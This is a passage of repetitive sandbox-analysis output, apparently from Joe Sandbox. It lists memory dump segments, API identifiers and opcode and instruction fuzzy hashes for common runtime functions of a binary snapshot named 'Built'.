• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                        • Instruction ID: d7ff0fc84c63885f4ad9997c29539fd5777178999f6cbd563262bbf4002886c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8841D43291824587EE348B29A74427973A1EF65B81F182131F68ED36D9CF2CE482CB54
                                                                                                                                                                                                                                                        APIs
Memory Dump Source
• Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        • Opcode ID: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                                        • Instruction ID: 14158abfd7d765aff35c4f521640649d5e5df173ef2cddfc1e3cef4ca73ece10
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13219612B1C75646FE549A226B047BAB651BF65BC4FCC5470FE0DABB8ACEBDE041C200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                        • Instruction ID: 6b76e0ff4361bd17b88ad132046d82c8f01f0885ab35220bc16dd0e69b1d6e46
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F31A122A2860281FF116B559B8037C3691BFA1B91F492135F95DE73DACF7CE8C18B15
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                        • Instruction ID: a771bfc59f78610a09b1be8a1d5afca25e14996be5ee87d8ce3cf27fd38fb3e9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA114F21B1D64282EE609F119700179B264AFA5B94F486435FACCE7A9ECF3DE4804710
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                        • Instruction ID: b9db4eebd6a38d23403daf4b428746a1ddf82df7295bbbad5324463d52b7d062
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85218072A18A4286DF618F18D74037976A0BBA4B54F289238F65DD76DDDF7DD4018B00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                        • Instruction ID: 746715f2331bd27c1a40f8ff3ba34d05c2f53bd702c9384d50cfaf15f03364a2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E017061A0874540EE449F525B00469B6A1AFA5FE0F4C6631FE5CF3BDACF3CD8814300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E289390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF65E2845F4,00000000,00007FF65E281985), ref: 00007FF65E2893C9
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00007FF65E286476,?,00007FF65E28336E), ref: 00007FF65E288EA2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2592636585-0
                                                                                                                                                                                                                                                        • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                        • Instruction ID: 03770f26c59a0bc3710876a8acdad2ff722fc836c44e7674e2d334242210af3e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DD0C201F3824642EE54A76BBB466396252AF99BC4F8CD035FE0D83B4EDC3CC0814B00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF65E290C90,?,?,?,00007FF65E2922FA,?,?,?,?,?,00007FF65E293AE9), ref: 00007FF65E29D63A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                        • Instruction ID: f5d1832e896caa1be7be3ae7a5d7a6eae82285e47200a61c388d9548037fd0e9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47F05894F0920340FE642BB16B4127833914FA87A0F0C2730FD2EE62CEDE6CB4C0A220